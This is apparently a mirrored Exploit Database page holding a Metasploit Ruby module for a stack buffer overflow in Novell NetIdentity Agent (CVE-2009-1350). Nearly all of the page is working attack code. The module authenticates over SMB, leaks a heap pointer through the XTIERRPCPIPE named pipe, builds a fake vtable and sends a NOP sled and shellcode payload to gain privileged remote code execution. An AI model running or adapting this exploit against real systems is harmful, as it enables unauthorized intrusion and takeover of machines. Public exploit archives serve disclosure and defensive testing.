Novell NetIdentity Agent – XTIERRPCPIPE Named Pipe Buffer Overflow (Metasploit)

• Exploit Database
• 99 阅读

• 作者： Metasploit
  日期： 2010-11-24
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16376/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170

  ## # $Id: netidentity_xtierrpcpipe.rb 11127 2010-11-24 19:35:38Z jduck $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking   include Msf::Exploit::Remote::SMB   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow&apos;, &apos;Description&apos;=> %q{ This module exploits a stack buffer overflow in Novell&apos;s NetIdentity Agent. When sending a specially crafted string to the &apos;XTIERRPCPIPE&apos; named pipe, an attacker may be able to execute arbitrary code. The success of this module is much greater once the service has been restarted. }, &apos;Author&apos; => [ &apos;MC&apos;, &apos;Ruben Santamarta&apos; ], &apos;License&apos;=> MSF_LICENSE, &apos;Version&apos;=> &apos;$Revision: 11127 $&apos;, &apos;References&apos; => [ [ &apos;CVE&apos;, &apos;2009-1350&apos; ], [ &apos;OSVDB&apos;, &apos;53351&apos; ], [ &apos;BID&apos;, &apos;34400&apos; ], [ &apos;URL&apos;, &apos;http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1&apos; ], ], &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos; => &apos;process&apos;, # only one shot! }, &apos;Payload&apos; => { &apos;Space&apos; => 550, &apos;BadChars&apos; => "\x00\x09\x0c\x0b\x20\x0a\x0d\x5c\x5f\x2f\x2e\x40", &apos;StackAdjustment&apos; => -3500, &apos;PrependEncoder&apos; => "\x81\xe4\xf0\xff\xff\xff", }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos; => [ [ &apos;Windows 2000 / Windows XP / Windows 2003&apos;, { &apos;Ret&apos; => 0x41414141 } ], ], &apos;Privileged&apos; => true, &apos;DisclosureDate&apos; => &apos;Apr 6 2009&apos;, &apos;DefaultTarget&apos; => 0))   register_options( [ OptString.new(&apos;SMBUser&apos;, [ true, &apos;The username to authenticate as&apos;, &apos;metasploit&apos;]), OptString.new(&apos;SMBPass&apos;, [ true, &apos;The password for the specified username&apos;, &apos;metasploit&apos;]) ], self.class ) end   def mem_leak print_status("Connecting to the server...") connect()   print_status("Authenticating as user &apos;#{datastore[&apos;SMBUser&apos;]}&apos; with pass &apos;#{datastore[&apos;SMBPass&apos;]}&apos;...")   begin smb_login() rescue ::Exception => e print_error("Error: #{e}") disconnect return end   print_status("Connecting to named pipe \\XTIERRPCPIPE...")   # If the pipe doesn&apos;t exist, bail. begin pipe = simple.create_pipe(&apos;\\XTIERRPCPIPE&apos;) rescue ::Exception => e print_error("Error: #{e}") disconnect return end   # If we get this far, do the dance. fid = pipe.file_id   # Need to make a Trans2 request with the param of &apos;QUERY_FILE_INFO&apos; keeping our file_id trans2 = simple.client.trans2(0x0007, [fid, 1005].pack(&apos;vv&apos;), &apos;&apos;)   # Send the first request to get our pointer. leak =[0x00000004].pack(&apos;V&apos;) + [0x00000818].pack(&apos;V&apos;) leak << rand_text_alpha_upper(2040)   print_status("Sending malformed request...") pipe.write(leak)   heap_pointer_leaked = pipe.read()[2060,4].unpack(&apos;V&apos;)[0] print_status(sprintf("Heap Pointer leaked: 0x%.8x", heap_pointer_leaked))   print_status("Building fake VTable...") object = heap_pointer_leaked + 0x700 print_status(sprintf("Object: 0x%.8x", object)) method = object + 0x30 print_status(sprintf("Method: 0x%.8x", method)) shellcode = method + 0xA0 print_status(sprintf("Shellcode: 0x%.8x", shellcode))   pipe.close   return heap_pointer_leaked,object,method,shellcode end   def exploit heap_pointer_leaked,object,method,shellcode = mem_leak()   return if not shellcode   sploit =[0x00000002].pack(&apos;V&apos;) sploit << [0x00000000].pack(&apos;V&apos;) sploit << [object].pack(&apos;V&apos;) sploit << [0x00000000].pack(&apos;V&apos;) sploit << rand_text_alpha_upper(240) sploit << [object].pack(&apos;V&apos;) * 32 sploit << [method].pack(&apos;V&apos;) * 32 sploit << [shellcode].pack(&apos;V&apos;) * 32 sploit << make_nops(748) sploit << payload.encoded sploit << rand_text_alpha_upper(110)   print_status("Connecting to the server...") connect()   print_status("Authenticating as user &apos;#{datastore[&apos;SMBUser&apos;]}&apos; with pass &apos;#{datastore[&apos;SMBPass&apos;]}&apos;...")   begin smb_login() rescue ::Exception => e print_error("Error: #{e}") disconnect return end   print_status("Connecting to named pipe \\XTIERRPCPIPE...")   # If the pipe doesn&apos;t exist, bail. begin pipe = simple.create_pipe(&apos;\\XTIERRPCPIPE&apos;) rescue ::Exception => e print_error("Error: #{e}") disconnect return end   # ok, set up and send our exploit buffer... fid = pipe.file_id trans2 = simple.client.trans2(0x0007, [fid, 1005].pack(&apos;vv&apos;), &apos;&apos;) print_status("#{sploit.length} bytes written...") pipe.write(sploit)   handler disconnect end end